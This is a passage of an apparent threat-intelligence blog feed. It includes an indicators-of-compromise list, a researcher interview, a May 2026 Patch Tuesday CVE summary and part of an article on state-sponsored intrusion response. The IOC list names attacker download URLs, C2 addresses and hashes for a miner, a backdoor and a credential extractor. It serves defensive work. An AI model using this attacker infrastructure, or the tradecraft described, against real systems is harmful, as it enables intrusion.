id="cluster-7xmrig-sample">Cluster 7 - XMRig sample</h3><ul><li>96fc528ca5e7d1c2b3add5e31b8797cb126f704976c8fbeaecdbf0aa4309ad46</li></ul><h3 id="cluster-7xmrig-configuration">Cluster 7 - XMRig configuration</h3><ul><li>7aa88a64a527ade7d93c20faf23b54f2ee33ad9b1246cdc2f8ded2ab639affb1</li></ul><h3 id="cluster-7xmrig-remote-location-ip">Cluster 7 - XMRig remote location IP</h3><ul><li>83[.]229[.]126[.]195</li></ul><h3 id="cluster-7xmrig-remote-url">Cluster 7 - XMRig remote URL</h3><ul><li>hxxp://83[.]229[.]126[.]195:8081/xmrig</li></ul><h3 id="cluster-7xmrig-configuration-file-remote-location">Cluster 7 - XMRig configuration file remote location</h3><ul><li>hxxp://83[.]229[.]126[.]195:8081/config[.]json</li></ul><h3 id="cluster-8nim-based-backdoor">Cluster 8 - Nim-based backdoor</h3><ul><li>0c87871642f84e09e8d3fb23ec36bf55601323e31151a7017a85dbec929cf15d</li></ul><h3 id="cluster-8download-url-for-the-nim-based-backdoor">Cluster 8 - Download URL for the Nim-based backdoor</h3><ul><li>hxxps://1a820b09-95ba-44eb-b350-417e8241b725-00-1lgwuuen9b77p[.]worf[.]replit.dev/download</li></ul><h3 id="cluster-8attacker-controlled-sub-domain-hosting-the-nim-based-backdoor">Cluster 8 - Attacker controlled sub-domain hosting the Nim-based backdoor</h3><ul><li>a820b09-95ba-44eb-b350-417e8241b725-00-1lgwuuen9b77p[.]worf[.]replit.dev</li></ul><h3 id="cluster-8attacker-ip-that-downloaded-the-nim-based-backdoor">Cluster 8 - Attacker IP that downloaded the Nim-based backdoor</h3><ul><li>79[.]135[.]105[.]208</li></ul><h3 id="cluster-8c2-for-nim-based-backdoor">Cluster 8 - C2 for Nim-based backdoor</h3><ul><li>hxxp://13[.]62[.]52[.]206:5004&#xA0;</li></ul><h3 id="cluster-8c2-ip-for-nim-based-backdoor">Cluster 8 - C2 IP for Nim-based backdoor</h3><ul><li>13[.]62[.]52[.]206</li></ul><h3 id="cluster-8kscan-%E2%80%93-scanning-tool">Cluster 8 - KScan &#x2013; scanning tool</h3><ul><li>18d77c9c5bbb5b9d5bdfd366fdfcf26bad9e64c63ca865fad711bcce8e3d5a80</li></ul><h3 id="cluster-8ip-related-to-nim-based-backdoor-and-kscan">Cluster 8 - IP related to Nim-based backdoor and KScan</h3><ul><li>176[.]65[.]139[.]31</li></ul><h3 id="cluster-9gsocket">Cluster 9 - gsocket</h3><ul><li>d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa</li></ul><h3 id="cluster-9gsocket-secret-file">Cluster 9 - gsocket secret file</h3><ul><li>5bc5998161056b7c8f70c9724d8a63abc7ff8c3843b91c30cffab0899e39b7f8</li></ul><h3 id="cluster-9ip-related-to-miner-activity">Cluster 9 - IP related to Miner activity</h3><ul><li>47[.]104[.]248[.]7</li></ul><h3 id="cluster-10vmanage-credential-extractor-script">Cluster 10 - VManage credential extractor script</h3><ul><li>b0f51b098842cd630097b462aab0ec357e2c7824af37cca6d08165265da2c2d3</li></ul><h3 id="cluster-10check-for-root-escalation">Cluster 10 - Check for root escalation</h3><ul><li>72f570ce97de3eaaffef33d90b0c337a153fc9690cc34ee207b557d868360060</li><li>17302d903baf182f94dc3be40ab1e0874dd0eb2ec5255bf9131fd53591efe925</li></ul>]]></content:encoded></item><item><title><![CDATA[Breaking things to keep them safe with Philippe Laulheret]]></title><description><![CDATA[Philippe shares his unique journey from French engineering school to the front lines of cybersecurity, explaining how his lifelong love for solving puzzles helps him uncover critical security flaws before they can be exploited.]]></description><link>https://blog.talosintelligence.com/breaking-things-to-keep-them-safe-with-philippe-laulheret/</link><guid isPermaLink="false">6a021c44525fa5000158ebb4</guid><category><![CDATA[Humans of Talos]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Wed, 13 May 2026 10:00:54 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/humans_of_talos.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/humans_of_talos.jpg" alt="Breaking things to keep them safe with Philippe Laulheret"><p>In the latest Humans of Talos, Amy sits down with Senior Vulnerability Researcher Philippe Laulheret to demystify the world of ethical hacking. Philippe shares his unique journey from French engineering school to the front lines of cybersecurity, explaining how his lifelong love for solving puzzles helps him uncover critical security flaws before they can be exploited.<br><br>From his memorable <a href="https://blog.talosintelligence.com/revault-when-your-soc-turns-against-you/" rel="noreferrer">experiment using a green onion</a> to bypass a biometric fingerprint reader to his perspective on the reality of cybersecurity versus what we see in the movies, Philippe provides a fascinating look at the work that keeps our digital world safe.</p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/7ZlMTLE-G_8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Breaking things to keep them safe with Philippe Laulheret"></iframe></figure><p><strong>Amy Ciminnisi: So, can you talk to me a little bit about what you do in vulnerability research?</strong></p><p>Philippe Laulheret: I work in vulnerability research. Basically, my job is to find vulnerabilities in software, hardware, or things physically. It&#x2019;s an interesting position because I usually get to choose which target I want to look at, which confuses people usually, because usually it&#x2019;s a consulting role, or someone asks you to do that. But for us, we find vulnerabilities in things that we think are important. And then this way, people in different teams can write detection rules, and our customers are protected.</p><p><strong>AC: I love that you get to kind of pick a niche and explore. How did you get into this?</strong></p><p>PL: My deepest interest was more in reverse engineering, which is understanding how things work, software in particular. Throughout my whole life, I was really curious and really wanted to understand stuff. I guess research is an extension of that where you need to understand how the system works, and then it&#x2019;s a puzzle where you need to find a way to break it. In my teenage years, I was really interested in that. I started playing Capture The Flag, which are challenges where people design exercises where there is a bug to find and exploit. It was really fun. I was doing that to stay sharp with my skills, and eventually, I was able to transition from regular development work to actual research. All those years of playing CTF really helped, even if it wasn&apos;t professional.</p><p><strong>AC: Did you go to school initially for development work? What kind of career path led you here?</strong></p><p>PL: Originally, as you can hear, I have a French accent. In France, we have engineering schools, which are fancy grad schools. The process is first you study very hard in math and physics, and then you go to grad school. At that time, I was convinced I wanted to do security, and I joined an electrical and computer engineering school. Somehow, in that school, I discovered an interest for different aspects of software development. I was getting interested in computer vision and other things. When I moved to the U.S. for development work instead of security work, I worked in a design studio for four years, which was really fun. I was making interactive installations. But as I said, I was playing CTF on the side to keep security pretty high in my head. Eventually, I moved to New York and joined a cybersecurity startup, and finally, I moved back to the Pacific Northwest, where I&#x2019;m currently living, and I was finally able to do vulnerability research the way I wanted to.</p><hr><p><em>Want to see more? Watch the&#xA0;</em><a href="https://youtu.be/7ZlMTLE-G_8" rel="noreferrer"><em>full interview</em></a><em>, and don&#x2019;t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.</em></p>]]></content:encoded></item><item><title><![CDATA[Microsoft Patch Tuesday for May 2026 — Snort rules and prominent vulnerabilities]]></title><description><![CDATA[Microsoft has released its monthly security update for May 2026, which includes 137 vulnerabilities affecting a range of products, including 16 that Microsoft marked as “critical”. ]]></description><link>https://blog.talosintelligence.com/microsoft-patch-tuesday-may-2026/</link><guid isPermaLink="false">6a025a69525fa5000158ebe3</guid><category><![CDATA[Patch Tuesday]]></category><dc:creator><![CDATA[Jaeson Schultz]]></dc:creator><pubDate>Tue, 12 May 2026 19:57:04 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/patch_tuesday.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/patch_tuesday.jpg" alt="Microsoft Patch Tuesday for May 2026 &#x2014; Snort rules and prominent vulnerabilities"><p><em>By</em>&#xA0;<em>Jaeson Schultz</em>&#xA0;</p><p>Microsoft has released its monthly security update for&#xA0;May 2026, which includes&#xA0;137&#xA0;vulnerabilities affecting a range of products, including&#xA0;31&#xA0;that Microsoft marked as &#x201C;critical&#x201D;.&#xA0;</p><p>In this month&apos;s release, Microsoft has not&#xA0;observed&#xA0;any&#xA0;of the included vulnerabilities being actively exploited in the wild. Out of 31 &quot;critical&quot; entries, 16&#xA0;are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including Microsoft Office, Microsoft Word, Windows Native&#xA0;WiFi&#xA0;Miniport Driver, Azure, Office for Android, Microsoft Dynamics 365, Windows GDI, Microsoft SharePoint, Windows Graphics Component, Windows&#xA0;Netlogon, and Windows DNS Client.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32161" rel="noreferrer noopener"><u>CVE-2026-32161</u></a>&#xA0;is a critical use after free vulnerability.&#xA0;Concurrent execution using&#xA0;a&#xA0;shared resource with improper synchronization (&apos;race condition&apos;) in Windows Native&#xA0;WiFi&#xA0;Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33109" rel="noreferrer">CVE-2026-33109</a> is a critical  access control vulnerability in Azure Managed Instance for Apache Cassandra. Improper access control allows an authorized attacker to execute code over a network.</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33844" rel="noreferrer">CVE-2026-33844</a> is a critical input validation vulnerability in Azure Managed Instance for Apache Cassandra. Improper input validation allows an authorized attacker to execute code over a network.</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35421" rel="noreferrer noopener"><u>CVE-2026-35421</u></a>&#xA0;is a critical heap-based buffer overflow vulnerability in Windows GDI that allows an unauthorized attacker to execute code locally. For this vulnerability to be exploited, a user would need to open or otherwise process a specially crafted Enhanced Metafile (EMF) file using Microsoft Paint. This action is necessary to trigger the affected graphics functionality in the Windows&#xA0;component.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40358" rel="noreferrer noopener"><u>CVE-2026-40358</u></a>&#xA0;is a critical use after free vulnerability in Microsoft Office which&#xA0;allows&#xA0;an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40361" rel="noreferrer noopener"><u>CVE-2026-40361</u></a>&#xA0;is a critical use after free vulnerability in Microsoft Word that allows an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40363" rel="noreferrer noopener"><u>CVE-2026-40363</u></a>&#xA0;is a critical heap-based buffer overflow in Microsoft Office which allows an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40364" rel="noreferrer noopener"><u>CVE-2026-40364</u></a>&#xA0;is a critical heap-based buffer overflow vulnerability. Access of resource using incompatible type (&apos;type confusion&apos;) in Microsoft Office Word allows an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40365" rel="noreferrer noopener"><u>CVE-2026-40365</u></a>&#xA0;is a critical vulnerability affecting Microsoft SharePoint. Insufficient granularity of access control allows an authorized attacker to execute code over a network.&#xA0;In a network-based attack, an authenticated attacker, as at least a Site Owner, could write arbitrary code to inject and execute code remotely on the SharePoint Server.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40366" rel="noreferrer noopener"><u>CVE-2026-40366</u></a>&#xA0;is a critical use after free vulnerability in Microsoft Word which allows an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40367" rel="noreferrer noopener"><u>CVE-2026-40367</u></a>&#xA0;is a critical vulnerability affecting Microsoft Word. An untrusted pointer dereference may allow an unauthorized attacker to execute code locally.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40403" rel="noreferrer noopener"><u>CVE-2026-40403</u></a>&#xA0;is a critical heap-based buffer overflow vulnerability in&#xA0;Windows Win32K &#x2013; GRFX that&#xA0;allows an authorized attacker to execute code locally. This vulnerability could lead to a contained execution environment escape.&#xA0;In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with a vulnerable Remote Desktop Client.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089" rel="noreferrer noopener"><u>CVE-2026-41089</u></a>&#xA0;is a&#xA0;critical&#xA0;stack-based buffer overflow in Windows&#xA0;Netlogon&#xA0;that&#xA0;allows an unauthorized attacker to execute code over a network.&#xA0;An attacker could send a specially crafted network request to a Windows server that is acting as a domain controller. If successful, this could cause the&#xA0;Netlogon&#xA0;service to improperly handle the request, potentially allowing the attacker to run code on the affected system without needing to sign in or have prior access.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096" rel="noreferrer noopener"><u>CVE-2026-41096</u></a>&#xA0;is a critical&#xA0;heap-based overflow vulnerability in Windows DNS Client. An attacker could exploit this vulnerability by sending a specially crafted DNS response to a vulnerable Windows system, causing the DNS Client to incorrectly process the response and corrupt memory. In certain configurations, this could allow the attacker to run code remotely on the affected system without authentication.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42831" rel="noreferrer noopener"><u>CVE-2026-42831</u></a>&#xA0;is a critical heap-based buffer overflow vulnerability in Office for Android that allows an unauthorized attacker to execute code locally. An attacker must send a user a malicious Office file and convince them to open it.&#xA0;</p><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42898" rel="noreferrer">CVE-2026-42898</a> is a critical code injection vulnerability in Microsoft Dynamics 365 (on-premises). Improper control of generation of code (&apos;code injection&apos;) allows an authorized attacker to execute code over a network. An attacker with the required permissions could modify the saved state of a process session in Dynamics CRM and trigger the system to process that data, which could result in the server unintentionally executing malicious code.</p><p>Talos would also like to highlight the following &quot;important&quot; vulnerabilities as Microsoft has&#xA0;determined&#xA0;that their exploitation is &quot;more likely:&quot;&#xA0;&#xA0;&#xA0;</p><ul><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33835" rel="noreferrer noopener"><u>CVE-2026-33835</u></a>: Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33837" rel="noreferrer noopener"><u>CVE-2026-33837</u></a>: Windows TCP/IP Local Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33840" rel="noreferrer noopener"><u>CVE-2026-33840</u></a>: Win32k Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33841" rel="noreferrer noopener"><u>CVE-2026-33841</u></a>: Windows Kernel Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35416" rel="noreferrer noopener"><u>CVE-2026-35416</u></a>: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35417" rel="noreferrer noopener"><u>CVE-2026-35417</u></a>: Windows Win32k Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40369" rel="noreferrer noopener"><u>CVE-2026-40369</u></a>: Windows Kernel Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40397" rel="noreferrer noopener"><u>CVE-2026-40397</u></a>: Windows Common Log File System Driver Elevation of Privilege Vulnerability&#xA0;</li><li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40398" rel="noreferrer noopener"><u>CVE-2026-40398</u></a>: Windows Remote Desktop Services Elevation of Privilege Vulnerability&#xA0;</li></ul><p>A complete list of all the other vulnerabilities Microsoft&#xA0;disclosed&#xA0;this month is available on its&#xA0;<a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-may" rel="noreferrer noopener"><u>update page</u></a>.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that&#xA0;additional&#xA0;rules may be released at a future date, and current rules are subject to change pending&#xA0;additional&#xA0;information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on&#xA0;<a href="https://www.snort.org/" rel="noreferrer noopener"><u>Snort.org</u></a>.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 1:66438-1:66445, 1:66451-1:66460, and 1:66470-1:66476.&#xA0;&#xA0;</p><p>The following Snort 3 rules are also available:&#xA0;1:301494-1:301497, 1:301500-1:301506, 1:66472-1:66473, and 1:66476.&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[State-sponsored actors, better known as the friends you don’t want]]></title><description><![CDATA[Responding to a state-sponsored threat is nothing like responding to ransomware, and the differences can make or break the outcome. Learn why your IR plan might need revisiting, and the factors you should consider.]]></description><link>https://blog.talosintelligence.com/state-sponsored-actors-better-known-as-the-friends-you-dont-want/</link><guid isPermaLink="false">6a01ea86525fa5000158eb8d</guid><category><![CDATA[Threats]]></category><category><![CDATA[APT]]></category><dc:creator><![CDATA[Elio Biasiotto]]></dc:creator><pubDate>Tue, 12 May 2026 10:00:54 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/thefriendsyoudontwant_updated.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>State-sponsored actors&#xA0;don&apos;t&#xA0;break in. They log in, and they use your own tools to stay invisible for months.</li><li>Responding to&#xA0;a state-sponsored threat&#xA0;is nothing like responding to ransomware, and the differences can make or break the outcome.&#xA0;</li><li>From logging and baselines to OT segmentation and supply chain readiness, the work that matters happens long before the first alert.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/thefriendsyoudontwant_updated.jpg" alt="State-sponsored actors, better known as the friends you don&#x2019;t want"><p>Most organizations&#xA0;operate&#xA0;under&#xA0;the assumption that&#xA0;anything&#xA0;residing&#xA0;within&#xA0;their trust boundary is trustworthy. Software arrives from vetted vendors,&#xA0;<a href="https://cloud.google.com/transform/ultimate-insider-threat-north-korean-it-workers/" rel="noreferrer noopener"><u>employees</u></a>&#xA0;pass background&#xA0;checks,&#xA0;cloud providers hold compliance certifications, and build pipelines produce signed artifacts.&#xA0;</p><p>In practice, these assumptions are rarely scrutinized, and state-sponsored actors have constructed their operational methodology around exploiting precisely this gap. They operate inside the trust boundary, using trusted tools, holding valid credentials, and performing actions that appear entirely authorized. Conventional security architecture is not designed to identify this, and that limitation warrants acknowledgment before turning to what incident response looks like when the adversary is a state-sponsored.</p><p>Responding to a&#xA0;state-sponsored&#xA0;intrusion is fundamentally different from responding to a&#xA0;criminal one. The&#xA0;adversary&#xA0;is better resourced, more patient, operationally disciplined, and often&#xA0;in pursuit of&#xA0;objectives&#xA0;that do not&#xA0;trigger any alarms,&#xA0;such as espionage or long-term data extraction. Standard incident response playbooks,&#xA0;typically&#xA0;built around malware containment and ransomware recovery, are not adequate for this category of threat. The tooling, decision-making, legal coordination, and even the definition of what constitutes a successful response all need to be reconsidered.&#xA0;&#xA0;</p><p>This is also the context in which zero trust architecture becomes essential. This is a&#xA0;fundamental reorientation from a model in which trust is assumed to one in which it is continuously verified, and in which systems are architected to handle the case where verification fails.&#xA0;The operative principle is not &quot;trust nothing,&quot;&#xA0;which no organization can realistically operationalize, but rather &quot;verify continuously and plan for failure.&quot;&#xA0;</p><p>The following sections&#xA0;cover how&#xA0;state-sponsored&#xA0;actors&#xA0;operate&#xA0;across the&#xA0;Cyber Kill&#xA0;Chain, why their techniques demand different detection and response approaches, and what organizations need to have in place before, during, and after an intrusion to mount an effective response.</p><h2 id="same-kill-chain-different-objective">Same&#xA0;Kill&#xA0;Chain,&#xA0;different&#xA0;objective&#xA0;</h2><p>Every&#xA0;cyber&#xA0;attack, from commodity ransomware to&#xA0;<a href="https://industrialcyber.co/reports/waterfall-threat-report-2026-finds-ransomware-slowdown-masks-deeper-shift-toward-nation-state-attacks-on-critical-infrastructure/" rel="noreferrer noopener"><u>state-sponsored</u>&#xA0;<u>espionage</u></a>, follows the same fundamental sequence as the&#xA0;<a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html" rel="noreferrer noopener"><u>Cyber Kill Chain</u></a>&#xA0;developed by Lockheed Martin: reconnaissance, weaponization, delivery, exploitation, installation, command and control&#xA0;(C2), and action on&#xA0;objectives.&#xA0;State-sponsored&#xA0;actors do not deviate from this sequence. They execute each phase with greater patience, greater precision, and a fundamentally different&#xA0;objective.&#xA0;</p><p>A financially motivated attacker requires the target to know it has been compromised. The ransomware&#xA0;note, the leak site, and the negotiation channel are all components of the business model. A&#xA0;state-sponsored&#xA0;actor&#xA0;requires&#xA0;the opposite. Whether the&#xA0;objective&#xA0;is espionage, intellectual property theft, or pre-positioning&#xA0;<a href="https://techinformed.com/cybersecurity-predictions-2026-quantum-threats-nation-state-attacks-and-the-rise-of-dark-ai/" rel="noreferrer noopener"><u>for future disruption</u></a>, success depends on the target remaining unaware. That requirement for covertness shapes every technical decision the actor makes and determines what defenders need to look for at each phase. The following are common trends that change the dimensions of defense:</p><ul><li><strong>Reconnaissance</strong>:&#xA0;This stage tends to be deeper and more prolonged. Where a financially motivated actor might scan for exposed Remote Desktop Protocol (RDP) and move on, a state-sponsored adversary may spend weeks or months mapping an organization&apos;s personnel, technology stack, vendor relationships, and communication patterns, often entirely outside the target&apos;s perimeter through open-source intelligence (OSINT) and social engineering of adjacent organizations. This phase frequently leaves no artifacts in defender logs. State-sponsored actors also have lawful access laws in their respective countries that allow them to obtain some of this data without the target being aware that any reconnaissance is taking place.</li><li><strong>Initial</strong>&#xA0;<strong>access</strong>:&#xA0;State-sponsored&#xA0;adversaries can afford to&#xA0;expend&#xA0;significant capabilities against a single target, including zero-days or supply chain vectors that signature-based detection will not&#xA0;identify. More commonly, however, they use legitimate credentials obtained through spear phishing or supply chain compromise, which&#xA0;produce&#xA0;no exploit signature at all.&#xA0;</li><li><strong>Lateral</strong>&#xA0;<strong>movement</strong>:&#xA0;This is where the covert imperative becomes most technically consequential. Rather than deploying custom malware,&#xA0;state-sponsored&#xA0;actors increasingly&#xA0;operate&#xA0;using tools already present on the&#xA0;target&apos;s&#xA0;systems, such as PowerShell, WMI, and&#xA0;PsExec, or they take time to&#xA0;observe&#xA0;what tools are used in the environment. If the environment uses SCCM or Puppet to manage infrastructure, the&#xA0;state-sponsored&#xA0;actor will aim to gain access to these systems and use legitimate deployment methods to compromise&#xA0;additional&#xA0;hosts. When Active Directory is queried through PowerShell, the security stack&#xA0;registers&#xA0;a routine administrative task, because it is indistinguishable from one. Extended dwell times result not from slow operational tempo, but from deliberate use of trusted tools to minimize the detection surface.&#xA0;</li><li><strong>Persistence</strong>:&#xA0;State-sponsored&#xA0;actors&#xA0;operate&#xA0;on the assumption that any single access method may be discovered and therefore&#xA0;establish&#xA0;multiple mechanisms across&#xA0;different parts&#xA0;of the infrastructure.&#xA0;Think&#xA0;aboutscheduled tasks, modified service configurations, dormant accounts,&#xA0;and&#xA0;firmware-level implants. These footholds may remain inactive for extended periods, activating only when an intelligence requirement or geopolitical trigger demands it.&#xA0;</li><li><strong>Action on</strong>&#xA0;<strong>objectives</strong>:&#xA0;This stage may not resemble what most teams would identify as an incident. If the&#xA0;objective&#xA0;is long-term&#xA0;data&#xA0;collection, exfiltration is structured to blend into normal traffic patterns. If the&#xA0;objective&#xA0;is pre-positioned disruption, as CISA&#xA0;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" rel="noreferrer noopener"><u>assessed</u></a>&#xA0;with Volt Typhoon in U.S. critical infrastructure, the actor may take no visible action during peacetime. Salt Typhoon&apos;s access to lawful&#xA0;<a href="https://www.cyber.nj.gov/threat-landscape/nation-state-threat-analysis-reports/china-linked-cyber-operations-targeting-us-critical-infrastructure/salt-typhoon" rel="noreferrer noopener"><u>intercept systems</u></a>&#xA0;required no disruptive action to deliver intelligence value. The access&#xA0;itself&#xA0;was the operation. When that access gets&#xA0;used&#xA0;is a separate question.&#xA0;</li><li><strong>Anti-forensics</strong>:&#xA0;Advanced actors clear event logs, manipulate file timestamps,&#xA0;operate&#xA0;in memory where possible, and use encrypted channels that leave minimal artifacts. Attribution may be further complicated by the deliberate planting of indicators associated with a different&#xA0;threat&#xA0;actor.&#xA0;</li></ul><p>Detection&#xA0;methodology&#xA0;does not require reinvention. The&#xA0;Kill&#xA0;Chain&#xA0;remains&#xA0;the same. It does, however, need to be calibrated for an adversary that treats every phase as an exercise in remaining invisible, that can&#xA0;operate using the target&apos;s own tooling, and that measures success in months of undetected access.</p><h2 id="attribution">Attribution&#xA0;</h2><p>Attribution in the context of incident response deserves a&#xA0;straightforward&#xA0;treatment, because&#xA0;it is&#xA0;frequently&#xA0;misunderstood&#xA0;and its operational relevance is often overstated at the tactical level. Technical attribution, associating an intrusion with a known threat actor based on&#xA0;tactics, techniques, and procedures (TTPs);&#xA0;infrastructure;&#xA0;and malware characteristics is possible with varying degrees of confidence and is useful primarily for informing the threat model and&#xA0;anticipating&#xA0;likely next&#xA0;steps. An organization that can assess with reasonable confidence that&#xA0;<a href="https://www.dataflowx.com/post/salt-typhoon-and-volt-typhoon-what-critical-infrastructure-operators-need-to-know" rel="noreferrer noopener"><u>Volt Typhoon</u></a>&#xA0;is responsible for&#xA0;an intrusion can make better-informed decisions about what systems to prioritize, what persistence mechanisms to hunt for, and what the likely&#xA0;objectives&#xA0;are. Political attribution, the public or legal assignment of responsibility to a&#xA0;state-sponsored&#xA0;actor, is a government function&#xA0;-not a security team function&#xA0;-&#xA0;and&#xA0;attempting&#xA0;it without the intelligence resources to support it creates more risk than it resolves.&#xA0;</p><p>The practical implication for incident response teams is that TTPs and infrastructure indicators should be shared with national authorities and relevant&#xA0;Information Sharing and Analysis Centers (ISACs), who are better positioned to place them in a broader intelligence context. Internal response&#xA0;should focus&#xA0;on containment,&#xA0;scope&#xA0;determination, and recovery regardless of whether attribution is ever formally&#xA0;established.&#xA0;</p><h2 id="preparing-for-the-long-game">Preparing for the&#xA0;long&#xA0;game&#xA0;</h2><p>Encountering a&#xA0;state-sponsored&#xA0;actor during incident response is not the time to discover logging gaps, missing baselines, or that the legal team has never discussed intelligence sharing with government agencies.&#xA0;The following sections cover&#xA0;the areas where preparation most directly&#xA0;determines&#xA0;whether detection and response are&#xA0;feasible.&#xA0;</p><h3 id="logging-and-visibility">Logging and&#xA0;visibility&#xA0;</h3><p>Default logging configurations are not sufficient for detecting the techniques described above.&#xA0;</p><ul><li><strong>Windows</strong>&#xA0;<strong>process</strong>&#xA0;<strong>creation</strong>&#xA0;(Event ID 4688): Enable full command-line argument logging to track exact parameters used during process execution.&#xA0;</li><li><strong>PowerShell</strong>&#xA0;<strong>script</strong>&#xA0;<strong>block</strong>&#xA0;<strong>logging</strong>&#xA0;(Event ID 4104): Capture the actual code being executed, not just the fact that PowerShell was launched.&#xA0;</li><li><strong>Sysmon</strong>: Deploy with a configuration tuned to detect suspicious parent-child process relationships, flagging legitimate binaries used as proxies for malicious activity, both on Windows and Linux environments.&#xA0;</li><li><strong>Strategic</strong>&#xA0;<strong>prioritization</strong>: If a full Sysmon rollout is impractical, prioritize critical servers, externally facing web applications, and cloud environments.&#xA0;Deploying Sysmon everywhere is sometimes not&#xA0;feasible&#xA0;due to very extensive&#xA0;and noisy logging. Prioritization is important here.&#xA0;</li><li><strong>Centralized</strong>&#xA0;<strong>log</strong>&#xA0;<strong>aggregation</strong>:&#xA0;Forward&#xA0;all logs to a write-once, centralized location, as sophisticated actors routinely clear local event logs, permanently destroying evidence left on compromised hosts&#xA0;</li></ul><p>More broadly, visibility needs to extend across identity systems, endpoints, network infrastructure, and cloud environments.&#xA0;</p><p>Endpoint telemetry alone is insufficient.&#xA0;State-sponsored&#xA0;actors&#xA0;operating&#xA0;through legitimate tools will generate process events that are difficult to distinguish from normal administrative activity, and network-layer visibility provides an independent detection plane that host-based logging cannot replace.&#xA0;</p><ul><li><strong>NetFlow</strong>&#xA0;<strong>analysis</strong>: Connection metadata without payload content is sufficient to&#xA0;identify&#xA0;unusual communication patterns, including beaconing behavior characteristic of C2 channels and lateral movement between systems that have no operational reason to communicate.&#xA0;</li><li><strong>DNS</strong>&#xA0;<strong>logging</strong>: Many C2 frameworks rely on DNS for command delivery and exfiltration. A host suddenly querying domains it has never previously resolved, or generating abnormal DNS query volumes,&#xA0;warrantsinvestigation.&#xA0;</li><li><strong>Encrypted</strong>&#xA0;<strong>traffic</strong>&#xA0;<strong>analysis</strong>: Machine learning models can&#xA0;identify&#xA0;C2 communication patterns in TLS sessions without breaking encryption, based on session timing, packet size distributions, and connection frequency. These capabilities do not require deep packet inspection and remain&#xA0;viable&#xA0;where&#xA0;privacy or compliance constraints limit payload visibility.&#xA0;</li></ul><h3 id="behavioral-baselines">Behavioral&#xA0;baselines&#xA0;</h3><p>CISA&apos;s&#xA0;<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" 